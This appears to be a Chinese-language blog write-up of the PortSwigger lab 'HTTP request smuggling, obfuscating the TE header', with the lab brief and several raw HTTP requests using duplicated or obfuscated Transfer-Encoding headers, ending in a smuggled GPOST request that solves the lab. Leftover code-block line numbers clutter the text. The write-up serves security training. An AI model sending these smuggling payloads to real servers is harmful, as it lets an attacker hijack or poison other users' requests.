从业者-混淆TE标头
# 实验室:HTTP请求走私-混淆TE标头
# 题目
此实验室涉及前端和后端服务器,这两个服务器以不同的方式来处理重复的 HTTP 请求标头。前端服务器拒绝 GET 或 POST 方法以外的请求。
若要解决实验室问题,请走私一个请求到后端服务器,使后端服务器处理的下一个请求使用GPOST方法。
笔记
尽管实验室支持 HTTP/2,但预期的解决方案需要依靠 HTTP/1 中的可用技术。你可以在 Burp Repeater 的面板 “Inspector > Request attributes” 部分手动切换协议。
提示
在请求走私攻击中,手动修复长度字段可能很棘手。我们的 Burp 扩展 HTTP Request Smuggler (opens new window) 可以提供这方面的帮助。你可以通过 BApp Store 安装它。
- name: 实验室-从业者
desc: HTTP请求走私-混淆TE标头 >>
avatar: https://fastly.statically.io/gh/clincat/blog-imgs@main/vuepress/static/imgs/docs/burpsuite-learn/public/lab-logo.png
link: https://portswigger.net/web-security/request-smuggling/lab-obfuscating-te-header
bgColor: '#001350'
textColor: '#4cc1ff'
1
2
3
4
5
6
2
3
4
5
6
# 实操
(目前只有图,文字后面有时间补)
点击 “ACCESS THE LAB” 进入实验室。
POST / HTTP/1.1
Host: ...
Content-Length: 12
Transfer-Encoding: chunked
0
carsaid
1
2
3
4
5
6
7
8
2
3
4
5
6
7
8
Transfer-Encoding: xchunked
Transfer-Encoding : chunked
1
2
2
POST / HTTP/1.1
Host: ...
Content-Length: 3
Transfer-Encoding: chunked
Transfer-Encoding: x
7
carsaid
0
1
2
3
4
5
6
7
8
9
10
11
2
3
4
5
6
7
8
9
10
11
POST / HTTP/1.1
Host: ...
Content-Length: 12
Transfer-Encoding: x
Transfer-Encoding: chunked
0
carsaid
1
2
3
4
5
6
7
8
9
2
3
4
5
6
7
8
9
POST / HTTP/1.1
Host: ...
Content-Length: 4
Transfer-Encoding: chunked
Transfer-Encoding: x
2e
GPOST /404 HTTP/1.1
Content-Length: 100
x=
0
1
2
3
4
5
6
7
8
9
10
11
12
13
14
2
3
4
5
6
7
8
9
10
11
12
13
14
编辑 (opens new window)